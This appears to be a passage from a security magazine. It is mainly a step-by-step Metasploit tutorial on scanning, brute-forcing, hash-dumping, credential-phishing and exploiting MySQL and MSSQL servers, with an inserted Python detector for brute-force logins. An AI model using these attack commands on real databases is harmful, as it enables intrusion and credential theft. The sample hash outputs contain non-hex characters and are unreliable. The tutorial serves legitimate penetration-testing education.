
Cortana is a full featured environment for developing 
red team bots and extending Armitage. If you'd like to 
learn more, take a look at the following resources: 

• Cortana Tutorial for Scripters 

• Public Cortana Script Repository 

• Sleep Manual 

Next, you will need to create a connect.prop file
to tell Cortana how to connect to the team server
you started. Here's an example connect.prop file: 

host=127.0.0.1
port=55553
user=msf
pass=password
nick=MyBot 

Now, to launch your bot: 

cd /path/to/metasploit/msf3/data/armitage 

java -jar cortana.jar connect.prop helloworld.cna 

Script Management 

You don't have to run Cortana bots stand-alone. 
You may load any bot into Armitage directly. When 
you load a bot into Armitage, you do not need to 
start a teamserver. Armitage is able to deconflict its 
actions from any loaded bots on its own. 

You may also use Cortana scripts to extend Ar- 
mitage and add new features to it. Cortana scripts 
may define keyboard shortcuts, insert menus into 
Armitage, and create simple user interfaces. 

To load a script into Armitage, go to Armitage 
-> Scripts. Press Load and choose the script you 
would like to load. Scripts loaded in this way will be 
available each time Armitage starts. 

Output generated by bots and Cortana com- 
mands are available in the Cortana console. Go to 
View -> Script Console. 



MICHAEL BOMAN 

Michael Boman is a penetration tester by
day and a malware researcher by night.
Michael has more than 10 years' experience
in security testing of applications and
infrastructure. He also delivers courses in
security testing and secure development.
Michael is passionate about computer security
and doing his best so that more people do it right
from the start. You can find him at his website
http://michaelboman.org where he tries to share
his experiences whenever he can. 
EXPLORING DATABASE 



How to use Sqlploit 



Databases nowadays are everywhere, from the smallest desktop 
applications to the largest web sites such as Facebook. Critical 
business information is stored in database servers that are often 
poorly secured. 



Someone with access to this information could
have control over a company's or an organization's
infrastructure. He could even sell this information
to a company's competitors. Imagine the damage
that something like this could cause. In this
article, we will see how we can use Metasploit to
attack our database servers. 

Metasploit is a very powerful tool. Actually, it is
not just a tool, it is a collection of tools. It is a
whole framework. It has gained incredible
popularity in the last few years because of its
success in the fields of penetration testing and
information security. It includes various tools,
from various scanners to exploits. It can be used
to discover software vulnerabilities and exploit
them. With database servers having so many
security weaknesses, Metasploit has numerous
auxiliary modules and exploits to assist you with
your database server penetration testing.
Metasploit is available for all popular operating
systems, so whatever operating system you are
already using should not be a problem. In this
article we are going to use Metasploit's auxiliary
modules and exploits to complete various
penetration testing tasks against popular database
servers, such as Microsoft SQL Server and MySQL.
I hope you enjoy it! 

Attacking a MySQL Database Server 

MySQL is the world's most used open source
relational database management system. Its source
code is available under the terms of the GNU
General Public License and other proprietary
license agreements. MySQL is the first database
choice when it comes to open source application
creation. MySQL is a very secure database system,
but as with any software that is publicly
accessible, you can't take anything for granted. 

Discover open MySQL ports 

MySQL runs by default on port 3306. You can
discover MySQL servers either with nmap or with
Metasploit's auxiliary modules. 

The NMAP way 

Nmap is a free and open source network discovery 
and security auditing utility. It can discover open 
ports, running services, operating system version 
and much more. To discover open MySQL ports 
we use it in this way: 



nmap -sT -sV -Pn -p 3306 192.168.200.133 

Figure 1. Discovering MySQL servers - The nmap way 

Parameters: 

-sT: TCP connect scan 

-sV: Determine Service version information 

-Pn: Ignore Host discovery 

-p 3306: Scan port 3306 

Scanning the whole network: 

nmap -sT -sV -Pn --open -p 3306 192.168.200.0/24 

Parameters: 

--open: Show only open ports (Figure 2) 

The Metasploit way 

Metasploit offers the auxiliary module mysql_version.
This module enumerates the version of running
MySQL servers. To use it type: 

use auxiliary/scanner/mysql/mysql_version 

To use this scanner you have to set its options.
Type: 

show options 

to see a list of available options (Figure 3).
Set the RHOSTS parameter: 

set RHOSTS 192.168.200.133 

or 

set RHOSTS 192.168.200.0/24 

Figure 2. Discovering MySQL servers - The nmap way 

Figure 3. mysql_version auxiliary module options 

Set the RPORT parameter to a different value if
you believe that the MySQL Server is listening on
a different port: 

set RPORT 3333 

Increase THREADS value for a faster scanning 
(Figure 4): 

set THREADS 50 

Now, all you have to type is: 

run 

and hit enter (Figure 5). 

As you can see from the screenshot we have a 
MySQL version 5.0.51a running at 192.168.200.133! 

Brute forcing MySQL 

There is an auxiliary module in Metasploit
called mysql_login which will happily query a
MySQL server for specific usernames and
passwords. The options for this module are shown
in Figure 6. 

Figure 4. mysql_version options after setting them up 

Figure 5. mysql_version scanner in action 

Figure 6. mysql_login module options 

To start your attack you have to set the RHOSTS
option and choose a username and a password. 

set RHOSTS 192.168.200.133 

set USERNAME root 

Leave the password blank. Your options, after
executing the commands above, should look like
Figure 6. mysql_login will try to log in with a blank
password and with the username as the password.
Maybe we are lucky before we start brute-forcing
the database with password lists (Figure 7). 

We were lucky! The administrator is completely 
ignorant. But what if we weren't so lucky? We then 
need a password list file. We can create one by 
ourselves or download one from the Internet. Let's 
create one! 

Creating a password list 

To create our password list we are going to use
crunch. If you are using BackTrack, crunch is
already installed. Open Privilege Escalation >
Password Attacks > Offline Attacks > crunch.
Otherwise download it from here
http://sourceforge.net/projects/crunch-wordlist/.
Execute: 

./crunch 6 8 abcde123456 -o passfile.lst 

The above command will create passwords
between 6 and 8 characters long, consisting of
ASCII characters a, b, c, d, e and numbers 1, 2, 3,
4, 5, 6 and will save the list into the file
passfile.lst (Figure 8). 

Figure 7. Starting brute-forcing database with passwords lists 

Figure 8. Generating a password list with crunch 

Using password lists 

Now that we have our password list stored in
/pentest/passwords/crunch/passfile.lst, we can
use it in the mysql_login module: 

set PASS_FILE /pentest/passwords/crunch/passfile.lst 

Increase also the number of concurrent threads
for a faster brute-force attack. 

set THREADS 50 
run 

The mysql_login module (Figure 9) offers two other
options, USER_FILE and USERPASS_FILE. You can use
a username list file to try various username values
by setting the USER_FILE option accordingly. With
the USERPASS_FILE parameter you can use a file
which contains both usernames and passwords,
separated by a space, one pair per line. 
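On the server side, a mysql_login run (and an ssh_login run from the Password Brute Force section of the Armitage article) leaves a dense trail of failed logins from one source. The detector below is an added example written for this edition, not code from the article or from Metasploit; the log lines are constructed, and the 5-failures-in-60-seconds threshold is an assumed tuning value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample logs (not from the article). The MySQL error log shows the
# trail a mysql_login run leaves: a blank-password try, then dictionary guesses.
# The sshd log shows the equivalent trail left by ssh_login with a USER_FILE.
MYSQL_LOG = """\
130501 10:00:01 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: NO)
130501 10:00:01 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: YES)
130501 10:00:02 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: YES)
130501 10:00:02 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: YES)
130501 10:00:03 [Warning] Access denied for user 'root'@'192.168.200.10' (using password: YES)
130501 10:30:00 [Warning] Access denied for user 'app'@'192.168.200.55' (using password: YES)
"""
SSH_LOG = """\
May  1 10:05:01 db01 sshd[2211]: Failed password for invalid user admin from 192.168.200.10 port 40212 ssh2
May  1 10:05:01 db01 sshd[2213]: Failed password for root from 192.168.200.10 port 40214 ssh2
May  1 10:05:02 db01 sshd[2215]: Failed password for invalid user test from 192.168.200.10 port 40216 ssh2
May  1 10:05:02 db01 sshd[2217]: Failed password for root from 192.168.200.10 port 40218 ssh2
May  1 10:05:03 db01 sshd[2219]: Failed password for invalid user oracle from 192.168.200.10 port 40220 ssh2
"""

# MySQL 5.x error-log line: "YYMMDD HH:MM:SS [Warning] Access denied for user 'u'@'h' (using password: YES|NO)"
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{6} \d\d:\d\d:\d\d) \[\w+\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<src>[^']+)' \(using password: (?P<pw>YES|NO)\)")
# sshd syslog line; "invalid user" marks a name that does not exist on the host
SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")


def parse_failures(text):
    """Yield (timestamp, service, user, source, blank_password) for each failed login."""
    for line in text.splitlines():
        m = MYSQL_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%y%m%d %H:%M:%S")
            yield ts, "mysql", m["user"], m["src"], m["pw"] == "NO"
            continue
        m = SSH_RE.match(line)
        if m:
            # syslog carries no year; strptime fills in 1900, which is fine for windowing
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, "ssh", m["user"], m["src"], False


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Alert once per (source, service) that reaches `threshold` failures inside a
    sliding window of `window_seconds`; both numbers are assumed tuning values."""
    recent = defaultdict(deque)   # (source, service) -> recent failures, oldest first
    alerted = set()
    alerts = []
    for ts, service, user, src, blank in parse_failures(text):
        key = (src, service)
        window = recent[key]
        window.append((ts, user, blank))
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "source": src,
                "service": service,
                "failures": len(window),
                "users": sorted({u for _, u, _ in window}),
                # mysql_login's first guess is a blank password: a useful early signal
                "blank_password_tries": sum(1 for _, _, b in window if b),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(MYSQL_LOG + SSH_LOG):
        print(alert)
```

On MySQL 5.x the Access denied lines only reach the error log when log_warnings is set above 1, so check that setting before relying on this detector.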

Bypass MySQL Authentication 

Module mysql_authbypass_hashdump exploits a
password bypass vulnerability in MySQL and can
extract usernames and encrypted password hashes
from a MySQL server. To select it type: 

use auxiliary/scanner/mysql/mysql_authbypass_hashdump 

Set the RHOSTS and THREADS options: 

set RHOSTS 192.168.200.133 
set THREADS 50 

and run the module. We can also set the
USERNAME parameter: 

set USERNAME root 

Unlucky! (Figure 10) 

Figure 9. mysql brute-force attack using password list 

Figure 10. Running mysql_authbypass_hashdump module 

Figure 11. mysql server hashes and usernames 

Dump MySQL Password Hashes 

mysql_hashdump extracts the usernames and
encrypted password hashes from a MySQL server.
One can then use the jtr_mysql_fast module to
crack them. The module is located in
auxiliary/scanner/mysql. To use it set the RHOSTS
option to our target's IP address and increase the
THREADS value. If you have managed to reveal the
root password then set also the USERNAME and
PASSWORD options. Run the module to get your
precious results! (Figure 11) 

Cracking passwords with John The Ripper 

Metasploit offers the module jtr_mysql_fast. This
module uses John the Ripper to identify weak
passwords that have been acquired from the
mysql_hashdump module. John the Ripper is a
free and Open Source password cracker, available
for many operating systems such as Unix,
Windows, DOS, BeOS, and OpenVMS. Its primary
purpose is to detect weak Unix passwords. After
having acquired MySQL hashes with the
mysql_hashdump module, load the jtr_mysql_fast
module and run it: 

use auxiliary/analyze/jtr_mysql_fast 
run 

Figure 12. jtr_mysql_fast module options 

Figure 13. mysql capture module options 

This module offers options such as setting a cus- 
tom path for john the ripper. The option that in- 
terests you the most is the Wordlist option, which 
is a path to your desired password list (Figure 
12). 

Getting the schema 

A database schema describes in a formal language
the structure of the database: the organization of
the data, how the tables, their fields and the
relationships between them must be defined, and
more. In general, a database schema defines the
way the database should be constructed.
Metasploit has the module mysql_schemadump to
get the MySQL schema. mysql_schemadump is located
under auxiliary/scanner/mysql. To use it you have
to set the RHOSTS, USERNAME and PASSWORD
options. If you are scanning more than one host,
increase the THREADS value! 

Let's go Phishing 

Phishing is an attempt to steal sensitive infor- 
mation by impersonating a well known organiza- 
tion. In the same manner you can trick a user into 
handing over her MySQL credentials. One of Metasploit's 
abilities is exactly this: mimicking known services and 
capturing user credentials. Among the various cap- 
ture modules there is a module called mysql. This 
module provides a fake MySQL service that is de- 
signed to capture MySQL server authentication 
credentials. It captures challenge and response 
pairs that can be supplied to Cain or John the Rip- 
per for cracking. 
To select the capture module type: 

use auxiliary/server/capture/mysql 

This module offers some interesting options. 
You can set the CAINPWFILE option to store cap- 
tured hashes in Cain&Abel format or JOHNPW- 
FILE to store hashes in John the Ripper format. 
Leave the SRVHOST option as it is, 0.0.0.0, to listen 
on the local host. You can also set the SRVVER- 
SION option, which is the version of the MySQL 
server that will be reported to clients in the greet- 
ing response. This option must agree with the true 
MySQL server version on the network if you don't 
want to be detected. You can also configure 
the module to use SSL! (Figure 13) 

Run the module and connect to the capture MySQL 
server from another computer on the network to 
see how it is working. To connect to a MySQL server 
open a terminal and type: 

mysql -h ip_address -u root -p 

Enter any password, for now, at mysql's prompt 
and see what is happening in Metasploit! (Figure 
14) 

Metasploit has captured the hash and now this 
hash is stored in Cain and John format in the files /tmp/ 
john and /tmp/cain. These are the files that I have 
chosen. 

Cain Format 

root NULL 

94e243cab3181cvef73852s3011651369196a928 

1122 634475697088 99agbbf cddnef f 2113434455 SHA1 

John format 

root:$mysqlna$11122 634 47 5697 08899agbb 
fcddneff2113434455 * 

94e243cab3181cvef73852s3011651369196a928 




Figure 14. mysql capture module in action 

Figure 15. Exploit's and payload's options 

Figure 16. mysql_yassl_hello exploit payloads 



MySQL Exploiting 

The MySQL database system is a very secure piece 
of software, and Metasploit doesn't offer many MySQL 
exploits, although some do exist. 

YaSSL Exploits 

YaSSL is a lightweight embedded SSL library. 
Metasploit offers two exploits for this library: 
mysql_yassl_getname and mysql_yassl_hello. 
mysql_yassl_getname exploits a stack buffer 
overflow in yaSSL 1.9.8 and earlier, and mysql_ 
yassl_hello exploits a stack buffer overflow in 
yaSSL 1.7.5 and earlier. To use any exploit you 
have to select it: 

use exploit/linux/mysql/mysql_yassl_getname 
use exploit/linux/mysql/mysql_yassl_hello 
use exploit/windows/mysql/mysql_yassl_hello 

As you can see, the last exploit is for Windows 
systems. After selecting your desired exploit, 
you have to select the payload. Each exploit of- 
fers a variety of payloads. You have to choose 
the most suitable one for your target. To see a list 
of available payloads for the exploit, type (Fig- 
ure 15): 

show payloads 

The most successful exploits usually use the 
reverse TCP payloads, where the target machine 
connects back to you. Each payload offers some 
options. By typing 

show options 

you will see the exploit's and the payload's options (Fig- 
ure 16). 

Other MySQL Exploits 

We should mention here two more exploits that are 
available for MySQL systems that run on Windows 
servers: mysql_payload and scrutinizer_ 
upload_exec. The first exploit, mysql_payload, cre- 
ates and enables a custom UDF on the target. On 
default Microsoft Windows installations of MySQL 
5.5.9 and earlier, directory write permissions are 
not enforced, and the MySQL service runs as Lo- 
calSystem. This module will leave a payload ex- 
ecutable on the target system and the UDF DLL, 
and will define or redefine the sys_eval and sys_ 
exec functions. The scrutinizer_upload_exec 
module exploits an insecure config found in Scru- 
tinizer NetFlow & sFlow Analyzer, a network traffic 
monitoring and analysis tool. By default, the soft- 
ware installs a default password in MySQL, and 
binds the service to "0.0.0.0". This allows any re- 
mote user to login to MySQL, and then gain arbi- 
trary remote code execution under the context of 
'SYSTEM'. 

We are in! 

And now what? Metasploit offers two modules 
that will assist you to enumerate a MySQL ser- 
vice or execute SQL queries. All you need is a val- 
id user-password pair. mysql_enum allows for sim- 
ple enumeration of a MySQL Database Server and 
mysql_sql allows for simple SQL statements to 
be executed against a MySQL instance. To select 
them, type: 

use auxiliary/admin/mysql/mysql_enum 

and execute the command 

show options 

to get a list of available options (Figure 17). 
To use mysql_sql execute (Figure 18): 

use auxiliary/admin/mysql/mysql_sql 

and 

show options 

Attacking a Microsoft SQL Server 

Microsoft SQL Server (MSSQL) is a relational da- 
tabase management system (RDBMS) used to 
store, retrieve and manage information. As with 
many Microsoft products, SQL Server has many 
security weaknesses. Let's start by identifying run- 
ning SQL servers on the network. 

Discover open MSSQL ports 

MSSQL is running by default on port 1433. To dis- 
cover SQL Server you can use either nmap or 
Metasploit's auxiliary module. 

The NMAP way 

To discover open MSSQL ports we execute the fol- 
lowing command: 

nmap -sT -sV -Pn -p 1433 192.168.200.133 

When administrators need more than one 
instance of SQL Server, they usually run the second 
instance on port 1434. 

nmap -sT -sV -Pn -p 1433,1434 192.168.200.133 

Parameters: 

-sT: TCP connect scan 

-sV: Determine service version information 

-Pn: Skip host discovery 

-p 1433,1434: Scan ports 1433 and 1434 



Scanning the whole network 

nmap -sT -sV -Pn --open -p 1433,1434 192.168.200.0/24 

Parameters: 

--open: Show only open ports 

Figure 17. mysql_enum module options 

Figure 18. mysql_sql module options 

Figure 19. mssql_ping module options 

Figure 20. mssql_ping module in action 

The Metasploit way 

Metasploit offers the auxiliary module mssql_ping. 
This module discovers running MSSQL services. 
To use it, type: 

use auxiliary/scanner/mssql/mssql_ping 

Type: 

show options 

for a list of available options (Figure 19). 

To discover all running MSSQL services on the 
net, set the RHOSTS value equal to 192.168.200.0/24, 
assuming that your target network is in this range, 
increase the THREADS value for faster scanning and 
run the module (Figure 20). 

Brute forcing MSSQL 

The auxiliary module mssql_login works in the 
same manner as mysql_login does. It will query 
the MSSQL instance for a specific username and 
password pair. The options for this module are 
shown in Figure 21. 

The default administrator's username for SQL 
Server is sa. In the options of this module, you 
can specify a specific password, a password 
list, a username list or a username-password list, 
where usernames and passwords are separated 
by a space and each pair is on a new line. Having set 
your options, simply run the module and wait for 
your results! You can create your own password 
list file, like we did in the first chapter where we 
used the mysql_login module. 

Figure 21. mssql_login options 

Figure 22. mssql_hashdump module 

Dump MSSQL Password Hashes 

mssql_hashdump extracts the usernames and en- 
crypted password hashes from a MSSQL server 
and stores them for later cracking with jtr_mssql_ 
fast. This module also saves information about 
the server version and table names, which can be 
used to seed the wordlist. The module is located 
in auxiliary/scanner/mssql. To use it, set the RHOSTS 
option to our target's IP address and increase the 
THREADS value to 50. If you have managed to 
reveal the root password then also set the options USER- 
NAME and PASSWORD. Run the module! (Figure 
22). 

Cracking MSSQL passwords with John The 
Ripper 

Metasploit offers the module jtr_mssql_fast. This 
module works in the same manner as jtr_mysql_ 
fast does. It uses John the Ripper to identify 
weak passwords that have been acquired from the 
mssql_hashdump module. After having acquired MS- 
SQL encrypted hashes with the mssql_hashdump mod- 
ule, load jtr_mssql_fast and run it. 

use auxiliary/analyze/jtr_mssql_fast 

and 

run 

You should set the Wordlist option, which is the 
path to your desired password list (Figure 23). 

Getting Microsoft SQL Server schema 

Metasploit offers the module mssql_schemadump 
to retrieve the MSSQL schema. mssql_schemadump 
is located under auxiliary/scanner/mssql. This 
module attempts to extract the schema from a 
MSSQL Server instance. It will disregard built-in 
and example DBs such as master, model, msdb 
and tempdb. The module will create a note for 
each DB found, and store a YAML formatted out- 
put as loot for easy reading. To use it you have to 
set the RHOSTS, USERNAME and PASSWORD op- 
tions. If you are scanning more than one host, in- 
crease the THREADS value to get results faster. 

Figure 23. jtr_mssql_fast module options 

Phishing with MSSQL 

Metasploit also has an MSSQL capture module, called 
mssql. This module provides a fake MSSQL service 
that is designed to capture MSSQL server authen- 
tication credentials. The module supports both the 
weak encoded database logins as well as Windows 
login (NTLM). To select the capture module type: 

use auxiliary/server/capture/mssql 

You can set the CAINPWFILE option to store cap- 
tured hashes in Cain&Abel format or JOHNPW- 
FILE to store hashes in John the Ripper format. 
Leave the SRVHOST option as it is, 0.0.0.0, to listen 
on the local host. You can configure the module 
to use SSL (Figure 24). 

Run the module and connect to the capture MS- 
SQL server from another computer on the network 
to see how it is working. To connect to a MSSQL 
server, open your Microsoft SQL Server Manage- 
ment Studio and try to login to the running service 
(Figure 25). Metasploit has captured the username 
and the password the user entered to login to the 
fake MSSQL service. 



Exploiting the Microsoft world 

Metasploit offers some MSSQL exploits. Let's take 
a look. 

Figure 24. mssql capture module options 

Figure 25. Login attempt captured by mssql capture module 

SQL Server 2000 

SQL Server 2000 is a very old version of Micro- 
soft SQL Server and it is hard to find on produc- 
tion environments nowadays. ms02_039_slammer 
exploits a resolution service buffer overflow. This 
overflow is triggered by sending a UDP packet to 
port 1434 which starts with 0x04 and is followed by a 
long string terminating with a colon and a number. 
To select it for use simply type: 

use exploit/windows/mssql/ms02_039_slammer 

Another exploit module for SQL Server 2000 is 
ms02_056_hello. ms02_056_hello is an exploit 
which will send malformed data to TCP port 1433 
to overflow a buffer and possibly execute code on 
the server with SYSTEM level privileges. To se- 
lect it, type: 

use exploit/windows/mssql/ms02_056_hello 

SQL Server 2000 - SQL Server 2005 

ms09_004_sp_replwritetovarbin and ms09_004_ 
sp_replwritetovarbin_sqli exploit a heap-based 
buffer overflow that occurs when calling the undoc- 
umented "sp_replwritetovarbin" extended stored 
procedure. This vulnerability affects all versions of 
Microsoft SQL Server 2000 and 2005, Windows 
Internal Database, and Microsoft Desktop Engine 
without the updates supplied in MS09-004. Micro- 
soft patched this vulnerability in SP3 for 2005. To 
use these exploits you type: 

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin 

or 

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 

As with any Metasploit module, you can type 

show options 

to get a list of available options (Figure 26). 
Type 

show payloads 

to get a list of available payloads for the select- 
ed exploit. 

Figure 26. ms09_004_sp_replwritetovarbin_sqli module options 

SQL Server database systems 

Metasploit offers the module exploit/windows/ 
mssql/mssql_payload, which executes an arbitrary 
payload on a Microsoft SQL Server by using the 
"xp_cmdshell" stored procedure. Three delivery 
methods are supported. The original method uses 
Windows 'debug.com'. Since this method invokes 
ntvdm, it is not available on x86_64 systems. A 
second method takes advantage of the Command 
Stager subsystem. This allows using various tech- 
niques, such as using a TFTP server, to send the 
executable. By default the Command Stager uses 
'wscript.exe' to generate the executable on the tar- 
get. Finally, ReLIK's latest method utilizes Power- 
Shell to transmit and recreate the payload on the 
target. 

Another interesting exploit module that can be 
applied to all SQL Server versions is exploit/ 
windows/mssql/mssql_payload_sqli. This module 
will execute an arbitrary payload on a Microsoft 
SQL Server, using a SQL injection vulnerability. 
Once a vulnerability is identified this module will 
use xp_cmdshell to upload and execute Metasploit 
payloads. It is necessary to specify the exact point 
where the SQL injection vulnerability happens. You 
should use a "reverse" payload on port 80 or on any 
other outbound port allowed on the firewall. 




Figure 27. mssql_sql_file module options 

Figure 28. mssql_findandsampledata module options 



From inside 

Metasploit offers various modules that will assist 
you to enumerate a MSSQL service, execute SQL 
queries, retrieve useful data and many more. All 
you need is a valid user-password pair. mssql_enum 
will perform a series of configuration audits and se- 
curity checks against a Microsoft SQL Server data- 
base, and mssql_sql and mssql_sql_file will allow for 
simple SQL statements to be executed against a 
MSSQL/MSDE or multiple SQL queries contained 
within a specified file. To select them, type: 

use auxiliary/admin/mssql/mssql_enum 

or 

use auxiliary/admin/mssql/mssql_sql 

or 

use auxiliary/admin/mssql/mssql_sql_file 

and execute the following command to see the 
options (Figure 27): 

show options 

Sample Data 

There is an amazing module called mssql_ 
findandsampledata. This module will search 
through all of the non-default databases on the 
SQL Server for columns that match the keywords 
defined in the TSQL KEYWORDS option. If col- 
umn names are found that match the defined key- 
words and data is present in the associated tables, 
the module will select a sample of the records from 
each of the affected tables. You have to set the 
sample size by configuring the sample size option. 
Your results will be stored in CSV format. Type 

use auxiliary/admin/mssql/mssql_findandsampledata 

and 

show options 

Figure 29. mssql_idf module options 

Executing Windows Commands 

If you have managed to find a valid username- 
password pair, the most desired thing that you 
would like to do is to execute a command on the 
compromised machine. Metasploit offers the module 
auxiliary/admin/mssql/mssql_exec which will ex- 
ecute a Windows command on a MSSQL/MSDE 
instance via the xp_cmdshell procedure. All you 
need is the username and password!! 

Data mining 

If you need to search for specific information in 
SQL Server databases there is a module that can 
make your life easier. Its name is mssql_idf, and 
you will find it under auxiliary/admin/mssql/. This 
module will search the specified MSSQL server 
for 'interesting' columns and data. The module 
works against SQL Server 2005 and SQL Server 
2008 (Figure 29). 

Conclusion 

Databases are the most important part of today's 
computing systems. They usually contain all the 
information needed to run a company or organi- 
zation. Therefore it is necessary to keep them as safe as 
possible. The Metasploit framework is just one of 
many tools out there that offers the appropriate scripts 
to compromise a database system. Databases are 
software that must be accessed by applications 
running on the Internet; that's why they must be 
guarded by firewalls, use encryption and power- 
ful passwords, and the whole system (database 
and operating system) must be checked every day 
for new updates and upgrades. The best choice 
would be to allow access to your database only 
from your intranet and/or VPN. Try not to expose 
your database directly to the web. Close all your 
database system ports now! 